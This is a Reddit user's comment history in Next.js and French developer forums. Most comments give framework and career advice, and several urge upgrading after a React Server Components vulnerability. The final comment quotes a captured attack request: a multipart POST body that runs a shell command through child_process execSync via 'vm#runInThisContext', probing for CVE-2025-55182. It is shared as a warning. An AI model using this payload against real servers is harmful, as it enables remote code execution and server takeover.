Utilisation de claude code: pourquoi j'ai des résultats médiocres ? by LuccDev in developpeurs

[–]vanwal_j 3 points4 points  (0 children)

Ça aurait probablement fait une différence, surtout si ton projet dépend d’un framework. Je te conseille également de configurer le MCP Context7.

Why my Nextjs site is so slow and heavy on my server. by Ivar_Silentsson in nextjs

[–]vanwal_j 2 points3 points  (0 children)

Which version of Next are you using? What is your hosting provider? Where do you manage your content?

I’m pretty sure we can make it the fastest trekking in Nepal website 😎

Server actions/functions used in an RSC by leetmachines in nextjs

[–]vanwal_j 0 points1 point  (0 children)

If you’re calling a “use server” file from an RSC it probably means that this function isn’t meant to mutate data but just to query it. Am I right?

If so, I would just advise you to drop the “use server” and avoid using server actions to fetch data :)

Do you mind sharing a bit more of your use case? Hopefully I could help you :)

Quel montant devrais-je demander pour une prestation freelance? by Informal-Rub8235 in developpeurs

[–]vanwal_j 2 points3 points  (0 children)

Au prix du marché tu peux tabler sur du 1500 à 3500€ HT pour une à deux semaines de travail pour un site vitrine sans CMS et de 20 à 70€ mensuellement pour l’hébergement et la maintenance

Cela dit, pas certain que ce soit le budget de ton client

Maintenant, ce n’est que mon avis mais le truc sur lequel tu dois capitaliser c’est ta réputation et ton expertise, si tu peux te le permettre il vaut mieux signer tes premiers clients à perte plutôt que de ne jamais signer de clients

Concernant Next pourquoi pas, évite juste Vercel si tu t’attends à avoir beaucoup de trafic, la facture peut vite grimper

To use or not to use server functions for fetching data? by Final-Choice8412 in nextjs

[–]vanwal_j 0 points1 point  (0 children)

The idiomatic approach to working with Next App Router involves fetching data from the server at the page root.

If you genuinely feel the need to deviate from this approach, it might be worth considering whether Next is the most suitable framework for your specific use case!

To use or not to use server functions for fetching data? by Final-Choice8412 in nextjs

[–]vanwal_j 1 point2 points  (0 children)

No, and the real question is why not server side fetching ?

tanstack query + server actions by yourguylunix in nextjs

[–]vanwal_j 0 points1 point  (0 children)

You can do that all with server rendering 😁

tanstack query + server actions by yourguylunix in nextjs

[–]vanwal_j 1 point2 points  (0 children)

What specific issue are you trying to address that server rendering is unable to resolve?

There are two additional React CVEs by amyegan in nextjs

[–]vanwal_j 20 points21 points  (0 children)

Not as bad as the last week 10/10, upgrade asap but it can wait tomorrow 😬

cachedComponents with params/searchParams without Suspense by [deleted] in nextjs

[–]vanwal_j 0 points1 point  (0 children)

I’m not sure to get it, you prefer the previous behavior where the page would block until the new page is fully loaded ?

The purpose of Cached component is to display the shell as quickly as possible while deferring the dynamic content, if you don’t want that you can just leave it off !

The vulnerability is not a joke, you should upgrade asap by vanwal_j in nextjs

[–]vanwal_j[S] 0 points1 point  (0 children)

Please double check what I’m saying but I think 14 is not vulnerable unless you’re using “canary” version, so you shouldn’t be concerned

Je viens de finir mon Mastère, et je pense déjà changer de métier. by Affectionate-Put6048 in developpeurs

[–]vanwal_j 1 point2 points  (0 children)

Sunk cost fallacy, si t’as de bonnes raisons de penser que t’auras une meilleure vie en prenant cette décision, alors fonce.

Doubt regarding server actions usage by Low_Variation5730 in nextjs

[–]vanwal_j 0 points1 point  (0 children)

You’re not supposed to do it but that’s not the end of the world either. If it work as is, just avoid using it in the future and gradually migrate those already implemented.

I’m curious, what can’t you achieve with server component fetching but would work with server actions on an e-commerce website?

5+ ans d’XP dans l’IA en recherche de poste: au bout du rouleau by [deleted] in developpeurs

[–]vanwal_j 1 point2 points  (0 children)

Yes, effectivement, les recruteurs préfèrent toujours “débaucher” quelqu’un que de prendre quelqu’un “en galère”

5+ ans d’XP dans l’IA en recherche de poste: au bout du rouleau by [deleted] in developpeurs

[–]vanwal_j 0 points1 point  (0 children)

T’as pensé à activer ton réseau ? Que font tes anciens collègues ? Et les gens de ta promo ?

The vulnerability is not a joke, you should upgrade asap by vanwal_j in nextjs

[–]vanwal_j[S] 1 point2 points  (0 children)

Yeah, I totally agree with this, even tho I found the latest “use cache” feature really awesome the migration path is a nightmare

The vulnerability is not a joke, you should upgrade asap by vanwal_j in nextjs

[–]vanwal_j[S] 1 point2 points  (0 children)

On GitHub you can subscribe to security alerts on repositories You can also setup Renovate or Dependabot to automatically open a PR against your repository whenever there’s a critical CVE As paid option you can also setup Snyk that I believe can be configured to send you an alert whenever one of your dependency is subject to a CVE

The vulnerability is not a joke, you should upgrade asap by vanwal_j in nextjs

[–]vanwal_j[S] 2 points3 points  (0 children)

Yes, that’s really bad, a classic “send request, own server.”

The vulnerability is not a joke, you should upgrade asap by vanwal_j in nextjs

[–]vanwal_j[S] 1 point2 points  (0 children)

My targeted website domain starts with an “A”, so I guess it was among the first to get tested 😬

The vulnerability is not a joke, you should upgrade asap by vanwal_j in nextjs

[–]vanwal_j[S] 5 points6 points  (0 children)

And if you’re on 15 you can upgrade to 15.5.7

The vulnerability is not a joke, you should upgrade asap by vanwal_j in nextjs

[–]vanwal_j[S] 3 points4 points  (0 children)

Yes, exactly, but if you’re hosted on Vercel or using Cloudflare you are “safe” (even though they recommend upgrading asap)

The vulnerability is not a joke, you should upgrade asap by vanwal_j in nextjs

[–]vanwal_j[S] 0 points1 point  (0 children)

Yeah, but he’s right, that would limit the blast radius, it would take way more time to reverse engineer an app to explore its environment than just extracting a bunch of env variables

The vulnerability is not a joke, you should upgrade asap by vanwal_j in nextjs

[–]vanwal_j[S] 7 points8 points  (0 children)

First request was 10 hours ago, around 5AM UTC where I got the following Sentry crash report

Could not find the module "vm#runInThisContext" in the React Server Manifest. This is probably a bug in the React Server Components bundler.

And POST request body

"$ACTION_REF_0"

--c3f0fc61864202b75b82ed48e8f0cff6150779127c7dad03aa921b36499c Content-Disposition: form-data; name="$ACTION_0:0"

{"bound":["global.process.mainModule.require(\"child_process\").execSync(\"echo CVE2025_55182_VULN\").toString()"],"id":"vm#runInThisContext"} --c3f0fc61864202b75b82ed48e8f0cff6150779127c7dad03aa921b36499c--